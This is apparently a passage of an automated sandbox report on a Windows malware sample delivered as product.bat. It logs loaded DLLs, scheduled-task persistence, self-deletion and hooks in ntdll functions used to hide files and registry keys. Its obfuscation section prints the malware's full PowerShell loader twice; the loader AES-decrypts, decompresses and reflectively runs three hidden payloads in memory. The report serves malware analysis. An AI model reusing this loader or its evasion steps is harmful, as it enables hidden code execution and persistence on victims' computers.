Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: product.batStatic file information: File size 7309406 > 1048576
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000020.00000000.1531285281.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3343115348.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbog source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000020.00000000.1531285281.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000002.3343115348.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\cmd.exe | Process created: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe | Process created: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: IhrFKM.exe.35.dr | Static PE information: 0xA8D14247 [Thu Oct 2 02:11:19 2059 UTC]
Source: C:\Windows\System32\winlogon.exe | Code function: 15_2_000001CA7D1E1E3C LoadLibraryA,GetProcAddress,SleepEx, | 15_2_000001CA7D1E1E3C
Source: C:\Windows\System32\winlogon.exe | Code function: 15_3_000001CA7D1CA7DD push rcx; retf 003Fh | 15_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exe | Code function: 16_3_0000017D2DD3A7DD push rcx; retf 003Fh | 16_3_0000017D2DD3A7DE
Source: C:\Windows\System32\svchost.exe | Code function: 17_3_0000022F4B90A7DD push rcx; retf 003Fh | 17_3_0000022F4B90A7DE
Source: C:\Windows\System32\dwm.exe | Code function: 18_3_00000262F1ECA7DD push rcx; retf 003Fh | 18_3_00000262F1ECA7DE
Source: C:\Windows\System32\dwm.exe | Code function: 18_3_00000262F1CEA7DD push rcx; retf 003Fh | 18_3_00000262F1CEA7DE
Source: C:\Windows\System32\cmd.exe | Code function: 22_3_000001B68BD0A7DD push rcx; retf 003Fh | 22_3_000001B68BD0A7DE
Source: C:\Windows\System32\conhost.exe | Code function: 23_3_000001E591CAA7DD push rcx; retf 003Fh | 23_3_000001E591CAA7DE
Source: C:\Windows\System32\svchost.exe | Code function: 26_3_000002234E11A7DD push rcx; retf 003Fh | 26_3_000002234E11A7DE
Source: C:\Windows\System32\svchost.exe | Code function: 27_3_0000023942AFA7DD push rcx; retf 003Fh | 27_3_0000023942AFA7DE
Source: C:\Windows\System32\svchost.exe | Code function: 28_3_000001EF056BA7DD push rcx; retf 003Fh | 28_3_000001EF056BA7DE
Source: C:\Windows\System32\svchost.exe | Code function: 29_3_000002287A7EA7DD push rcx; retf 003Fh | 29_3_000002287A7EA7DE
Source: C:\Windows\System32\svchost.exe | Code function: 30_3_000001B94DA7A7DD push rcx; retf 003Fh | 30_3_000001B94DA7A7DE
Source: C:\Windows\System32\svchost.exe | Code function: 31_3_000002520255A7DD push rcx; retf 003Fh | 31_3_000002520255A7DE
Source: C:\Windows\System32\svchost.exe | Code function: 32_3_000001A9EBFAA7DD push rcx; retf 003Fh | 32_3_000001A9EBFAA7DE
Source: C:\Windows\System32\svchost.exe | Code function: 33_3_0000019FF161A7DD push rcx; retf 003Fh | 33_3_0000019FF161A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Windows\$nya-onimai2\IhrFKM.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\System32\Tasks\$nya-mW41WeM4

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: c:\users\user\desktop\product.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
